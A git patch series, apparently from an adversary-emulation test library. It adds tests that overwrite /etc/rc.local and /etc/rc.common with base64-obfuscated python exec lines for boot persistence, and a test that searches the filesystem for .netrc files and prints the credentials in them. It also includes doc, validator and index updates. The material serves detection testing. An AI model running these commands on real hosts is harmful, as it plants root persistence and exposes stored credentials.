From cec771d64f0dc6c4464b247e58b835c0fcbcc49a Mon Sep 17 00:00:00 2001
From: madhavbhatt <madhav.bhatt73@gmail.com>
Date: Sat, 29 May 2021 14:54:22 -0700
Subject: [PATCH 01/11] Add test for T1037.004 that modifies rc.local and
 rc.common files on Linux

---
 atomics/T1037.004/T1037.004.yaml | 37 ++++++++++++++++++++++++++++++++
 1 file changed, 37 insertions(+)

diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml
index 8b664b82..9ec58a6f 100644
--- a/atomics/T1037.004/T1037.004.yaml
+++ b/atomics/T1037.004/T1037.004.yaml
@@ -15,3 +15,40 @@ atomic_tests:
     elevation_required: true
     name: bash
 
+
+- name: rc.common
+  description: |
+    Modify rc.common
+
+  supported_platforms:
+    - linux
+  executor:
+    name: bash
+    elevation_required: true 
+    command: | 
+      filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+      printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+      printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+      sudo chmod +x /etc/rc.common
+    cleanup_command: | 
+      origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+
+- name: rc.local
+  description: |
+    Modify rc.local
+
+  supported_platforms:
+    - linux
+  executor:
+    name: bash
+    elevation_required: true 
+    command: | 
+      filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+      printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+      echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+      printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+      sudo chmod +x /etc/rc.local
+    cleanup_command: | 
+      origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
+

From b19ac6e34e088a8461c9287fbbd033c554d5c27f Mon Sep 17 00:00:00 2001
From: madhavbhatt <madhav.bhatt73@gmail.com>
Date: Sat, 29 May 2021 22:48:31 -0700
Subject: [PATCH 02/11] Update T1037.004.md : Atomic Doc Generated using
 bin/generate-atomic-docs.rb

---
 atomics/T1137.004/T1137.004.md | 102 ++++++++++++++++++++++++++-------
 1 file changed, 81 insertions(+), 21 deletions(-)

diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md
index 858ef875..5e258a38 100644
--- a/atomics/T1137.004/T1137.004.md
+++ b/atomics/T1137.004/T1137.004.md
@@ -1,45 +1,105 @@
-# T1137.004 - Outlook Home Page
-## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/004)
-<blockquote>Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
+# T1037.004 - RC Scripts
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004)
+<blockquote>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
 
-Once malicious home pages have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)
-</blockquote>
+Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
+
+Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
+
+Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</blockquote>
 
 ## Atomic Tests
 
-- [Atomic Test #1 - Install Outlook Home Page Persistence](#atomic-test-1---install-outlook-home-page-persistence)
+- [Atomic Test #1 - rc.common](#atomic-test-1---rccommon)
+
+- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon)
+
+- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal)
 
 
 <br/>
 
-## Atomic Test #1 - Install Outlook Home Page Persistence
-This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed.
+## Atomic Test #1 - rc.common
+Modify rc.common
 
-Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox).
+[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
 
-**Supported Platforms:** Windows
+**Supported Platforms:** macOS
 
 
 
 
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| url | URL to Outlook Home Page containing the payload to execute (can be local file:// or remote https://) | string | file://PathToAtomicsFolder&#92;T1137.004&#92;src&#92;T1137.004.html|
-| outlook_version | Version of Outlook that is installed | string | 16.0|
-| outlook_folder | Name of the Outlook folder to modify the homepage setting for | string | Inbox|
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
 
 
-#### Attack Commands: Run with `command_prompt`! 
+```bash
+sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
+```
 
 
-```cmd
-reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - rc.common
+Modify rc.common
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+sudo chmod +x /etc/rc.common
 ```
 
 #### Cleanup Commands:
-```cmd
-reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f
+```bash
+origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #3 - rc.local
+Modify rc.local
+
+**Supported Platforms:** Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
+
+
+```bash
+filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+sudo chmod +x /etc/rc.local
+```
+
+#### Cleanup Commands:
+```bash
+origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi
 ```
 
 

From ae62a04dedb99cc5db98f9b5250ef833de3a1c1b Mon Sep 17 00:00:00 2001
From: madhavbhatt <madhav.bhatt73@gmail.com>
Date: Tue, 1 Jun 2021 20:12:17 -0700
Subject: [PATCH 03/11] T1552.001 : Find and Access Unsecured Github
 Credentials in File

---
 atomics/T1552.001/T1552.001.md | 26 ++++++++++++++++++++++++++
 1 file changed, 26 insertions(+)

diff --git a/atomics/T1552.001/T1552.001.md b/atomics/T1552.001/T1552.001.md
index 300e9199..33589071 100644
--- a/atomics/T1552.001/T1552.001.md
+++ b/atomics/T1552.001/T1552.001.md
@@ -16,6 +16,8 @@ In cloud and/or containerized environments, authenticated user and service accou
 
 - [Atomic Test #4 - Access unattend.xml](#atomic-test-4---access-unattendxml)
 
+- [Atomic Test #5 - Find and Access Github Credentials](#atomic-test-5---find-and-access-github-credentials)
+
 
 <br/>
 
@@ -120,4 +122,28 @@ type C:\Windows\Panther\Unattend\unattend.xml
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Find and Access Github Credentials
+This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
+
+**Supported Platforms:** macOS, Linux
+
+
+
+
+
+#### Attack Commands: Run with `bash`! 
+
+
+```bash
+for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
+```
+
+
+
+
+
+
 <br/>

From 3f7ee8151e002e61c86e1287c14c4bac9465d573 Mon Sep 17 00:00:00 2001
From: madhavbhatt <madhav.bhatt73@gmail.com>
Date: Tue, 1 Jun 2021 20:39:26 -0700
Subject: [PATCH 04/11] T1552.001 : Find and Access Unsecured Github
 Credentials in File

---
 atomics/T1552.001/T1552.001.yaml | 17 ++++++++++++++++-
 1 file changed, 16 insertions(+), 1 deletion(-)

diff --git a/atomics/T1552.001/T1552.001.yaml b/atomics/T1552.001/T1552.001.yaml
index 5bd597e8..6a2fc54e 100644
--- a/atomics/T1552.001/T1552.001.yaml
+++ b/atomics/T1552.001/T1552.001.yaml
@@ -51,4 +51,19 @@ atomic_tests:
       type C:\Windows\Panther\unattend.xml
       type C:\Windows\Panther\Unattend\unattend.xml
     name: command_prompt
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
+
+- name: Find and Access Github Credentials
+  description: |
+    This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
+
+  supported_platforms:
+    - macos
+    - linux
+
+  executor:
+    name: bash
+    elevation_required: false # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
+    command: | 
+      for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done 
+      

From 2d54a45364530a325fd20357d3cef192910fa3f5 Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com>
Date: Thu, 3 Jun 2021 13:44:31 -0700
Subject: [PATCH 05/11] Update Platforms and Executors for ATT&CKv9

Implement changes proposed in https://github.com/redcanaryco/atomic-red-team/issues/1491
---
 atomic_red_team/atomic_red_team.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/atomic_red_team/atomic_red_team.rb b/atomic_red_team/atomic_red_team.rb
index 46a1266c..24a4c811 100755
--- a/atomic_red_team/atomic_red_team.rb
+++ b/atomic_red_team/atomic_red_team.rb
@@ -108,7 +108,7 @@ class AtomicRedTeam
       raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
       raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
   
-      valid_supported_platforms = ['windows', 'macos', 'linux']
+      valid_supported_platforms = ['windows', 'macos', 'linux', 'office-365', 'azure-ad', 'google-workspace', 'saas', 'iaas', 'containers', 'iaas:aws', 'iaas:azure', 'iaas:gcp']
       atomic['supported_platforms'].each do |platform|
         if !valid_supported_platforms.include?(platform)
           raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
@@ -142,7 +142,7 @@ class AtomicRedTeam
       raise("`atomic_tests[#{i}].executor.name` element must be a string") unless executor['name'].is_a?(String)
       raise("`atomic_tests[#{i}].executor.name` element must be lowercased and underscored (was #{executor['name']})") unless executor['name'] =~ /[a-z_]+/
   
-      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual']
+      valid_executor_types = ['command_prompt', 'sh', 'bash', 'powershell', 'manual', 'aws', 'az', 'gcloud']
       case executor['name']
         when 'manual'
           raise("`atomic_tests[#{i}].executor.steps` element is required") unless executor.has_key?('steps')
@@ -152,7 +152,7 @@ class AtomicRedTeam
                                          string: executor['steps'],
                                          string_description: "atomic_tests[#{i}].executor.steps"
 
-        when 'command_prompt', 'sh', 'bash', 'powershell'
+        when 'command_prompt', 'sh', 'bash', 'powershell', 'aws', 'az', 'gcloud'
           raise("`atomic_tests[#{i}].executor.command` element is required") unless executor.has_key?('command')
           raise("`atomic_tests[#{i}].executor.command` element must be a string") unless executor['command'].is_a?(String)
 

From bf0731c08028876d5fa9af21e7ed84cd997d2e9f Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com>
Date: Thu, 3 Jun 2021 13:51:20 -0700
Subject: [PATCH 06/11] Updating spec for ATT&CKv9

Including changes noted in https://github.com/redcanaryco/atomic-red-team/issues/1491
---
 atomic_red_team/spec.yaml | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/atomic_red_team/spec.yaml b/atomic_red_team/spec.yaml
index 0f46a9c4..9ccd2b42 100644
--- a/atomic_red_team/spec.yaml
+++ b/atomic_red_team/spec.yaml
@@ -51,6 +51,15 @@ atomic_tests:
   # - windows
   # - macos
   # - linux
+  # - office-365
+  # - azure-ad
+  # - google-workspace
+  # - saas
+  # - iaas
+  # - containers
+  # - iaas:gcp
+  # - iaas:azure
+  # - iaas:aws
   supported_platforms:
     - windows
 
@@ -106,6 +115,7 @@ atomic_tests:
   # a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
   # per test, but there are cases where you may have multiple - for example, separate executors for `sh`
   # and `bash` when working on linux OSes.
+  # Names of cloud/container specific runtimes can also be used, such as `aws`, `az`, and `gcloud`.
   executors:
   # the name of the executor describes the framework or application in which the test should be executed.
   #

From 753c1d59ee78c8999eff65b84623e4c1c6e5cf31 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 4 Jun 2021 17:12:47 +0000
Subject: [PATCH 07/11] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1543.002/T1543.002.md | 65 ----------------------------------
 1 file changed, 65 deletions(-)

diff --git a/atomics/T1543.002/T1543.002.md b/atomics/T1543.002/T1543.002.md
index 6f2f4e4b..c9bfec54 100644
--- a/atomics/T1543.002/T1543.002.md
+++ b/atomics/T1543.002/T1543.002.md
@@ -16,8 +16,6 @@ While adversaries typically require root privileges to create/modify service uni
 
 - [Atomic Test #1 - Create Systemd Service](#atomic-test-1---create-systemd-service)
 
-- [Atomic Test #2 - Create Systemd Service unit file,  Enable the service , Modify and Reload the service.](#atomic-test-2---create-systemd-service-unit-file--enable-the-service--modify-and-reload-the-service)
-
 
 <br/>
 
@@ -77,67 +75,4 @@ systemctl daemon-reload
 
 
 
-<br/>
-<br/>
-
-## Atomic Test #2 - Create Systemd Service unit file,  Enable the service , Modify and Reload the service.
-This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
-
-**Supported Platforms:** Linux
-
-
-
-
-
-#### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 
-
-
-```bash
-cat > /etc/init.d/T1543.002 << EOF
-#!/bin/bash
-### BEGIN INIT INFO
-# Provides : Atomic Test T1543.002
-# Required-Start: $all
-# Required-Stop : 
-# Default-Start: 2 3 4 5
-# Default-Stop: 
-# Short Description: Atomic Test for Systemd Service Creation
-### END INIT INFO
-python3 -c "import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))"
-EOF
-
-chmod +x /etc/init.d/T1543.002
-if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi ;
-systemctl enable T1543.002
-systemctl start T1543.002
-
-echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002
-systemctl daemon-reload
-systemctl restart T1543.002
-```
-
-#### Cleanup Commands:
-```bash
-systemctl stop T1543.002
-systemctl disable T1543.002
-rm -rf /etc/init.d/T1543.002
-systemctl daemon-reload
-```
-
-
-
-#### Dependencies:  Run with `bash`!
-##### Description: System must be Ubuntu ,Kali OR CentOS.
-##### Check Prereq Commands:
-```bash
-if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then exit /b 0; else exit /b 1; fi; 
-```
-##### Get Prereq Commands:
-```bash
-echo Please run these atomic tests from Ubuntu ,Kali OR CentOS.
-```
-
-
-
-
 <br/>

From 1f1a002d89edfcb4101aed55c1dad905a7826219 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team GUID generator <email>
Date: Fri, 4 Jun 2021 17:14:19 +0000
Subject: [PATCH 08/11] Generate GUIDs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/T1037.004/T1037.004.yaml | 2 ++
 atomics/used_guids.txt           | 2 ++
 2 files changed, 4 insertions(+)

diff --git a/atomics/T1037.004/T1037.004.yaml b/atomics/T1037.004/T1037.004.yaml
index 9ec58a6f..6004b8b4 100644
--- a/atomics/T1037.004/T1037.004.yaml
+++ b/atomics/T1037.004/T1037.004.yaml
@@ -17,6 +17,7 @@ atomic_tests:
 
 
 - name: rc.common
+  auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
   description: |
     Modify rc.common
 
@@ -35,6 +36,7 @@ atomic_tests:
       origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi
 
 - name: rc.local
+  auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
   description: |
     Modify rc.local
 
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index 409c774d..e78c5f95 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -706,3 +706,5 @@ e2d85e66-cb66-4ed7-93b1-833fc56c9319
 0b2f9520-a17a-4671-9dba-3bd034099fff
 28104f8a-4ff1-4582-bcf6-699dce156608
 46f8dbe9-22a5-4770-8513-66119c5be63b
+c33f3d80-5f04-419b-a13a-854d1cbdbf3a
+126f71af-e1c9-405c-94ef-26a47b16c102

From 94d442bcd63fa9a8f802aecd8f0eaa7bd1157c79 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Fri, 4 Jun 2021 17:14:26 +0000
Subject: [PATCH 09/11] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-linux.json            |   2 +-
 atomics/Indexes/Indexes-CSV/index.csv         |   4 +
 atomics/Indexes/Indexes-CSV/linux-index.csv   |   4 +
 atomics/Indexes/Indexes-Markdown/index.md     |   4 +
 .../Indexes/Indexes-Markdown/linux-index.md   |   8 +-
 atomics/Indexes/Matrices/linux-matrix.md      |   4 +-
 atomics/Indexes/index.yaml                    |  84 +++++++++++++++
 atomics/T1037.004/T1037.004.md                |  68 ++++++++++++
 atomics/T1137.004/T1137.004.md                | 102 ++++--------------
 9 files changed, 194 insertions(+), 86 deletions(-)

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index 31d2834b..fbe9e18a 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":